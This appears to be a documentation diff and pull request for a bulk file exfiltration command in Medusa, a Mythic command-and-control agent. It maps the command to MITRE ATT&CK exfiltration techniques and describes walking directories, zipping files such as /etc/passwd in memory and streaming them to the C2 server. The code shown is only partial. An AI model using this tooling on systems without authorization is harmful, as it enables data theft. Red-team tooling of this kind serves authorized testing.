+download_bulk {"path": "/remote/directory", "mode": "iterative"}
+```
+
+## MITRE ATT&CK Mapping
+
+- T1020
+- T1030
+- T1041
+
+## Detailed Summary
+
+The `download_bulk` function extends the single-file `download` capability to support bulk transfers.
+
+### Path detection
+
+The `path` argument is resolved using `os.path.isdir` and `os.path.isfile`. Relative paths are resolved against the agent's current working directory:
+
+- **Directory** – the directory tree is walked with `os.walk`; every file found is added to the transfer list.
+- **File** – treated as a single-item list.
+- **JSON list** – an explicit list of absolute file paths can be provided directly.
+
+### Archive mode
+
+An in-memory `zipfile.ZipFile` (backed by `io.BytesIO`) is created and populated with all target files. The zip data is then chunked and sent to the Mythic server using the same `download` API used by the single-file `download` command.
+
+Note: This can be extremely slow to transfer larger amounts of data due to chunking. Expect to take a walk or a nap if you're trying to pull thousands of files/hundreds of MB of data.
+
+Directory structure is preserved inside the zip using `os.path.relpath` to compute each entry's arcname:
+
+- **Directory input** (e.g. `/etc/nginx`): entries are anchored at the parent directory, so the top-level name is included — `nginx/nginx.conf`, `nginx/conf.d/default.conf`.
+- **Single file input**: only the filename is stored (`passwd`).
+- **Explicit list input**: entries are anchored at the filesystem root, preserving the full path — `etc/passwd`, `home/user/report.txt`.
+
+### Iterative mode
+
+Each file is transferred individually in the same chunked manner as the existing `download` command. A separate `file_id` is obtained from Mythic for each file, and the agent streams each one to completion before moving on to the next.
+
+```Python
+    def download_bulk(self, task_id, path, mode="archive"):
+        import zipfile, io
+
+        # Build file list from path (file, directory, or list)
+        ...
+
+        if mode == "iterative":
+            for file_path in file_list:
+                # chunk and send each file (same as download())
+                ...
+        else:
+            # Build in-memory zip
+            zip_buffer = io.BytesIO()
+            with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf:
+                for file_path in file_list:
+                    zf.write(file_path, arcname)
+            # chunk and send zip_buffer.getvalue()
+            ...
+```


### PR DESCRIPTION
TL;DR - https://github.com/MythicAgents/poseidon/pull/68 but for Medusa.

New functionality to facilitate bulk file downloads either through generation of an in-memory archive or individually retrieved and uploaded files. If a list of specific file paths is specified and one or more are inaccessible, the inaccessible files will be skipped and the task should continue to work as expected.

Due to the chunked nature of retrieval performance is not stellar but that's to be expected. Using the `Homebrew/brew` repository (~140MB across ~5000 files) as a testbed, the archival and transfer took ~20 minutes. Unlike the noted Poseidon implementation, this will always compress the archive in-memory prior to transfer in order to speed things up on the chunked transfer at the cost of on-device performance. "Iterative" (non-archive) transfers are handled without compression.

Heavily AI assisted as are all things in life these days, but tested and working on macOS 26.3.1. 

Very open to feedback!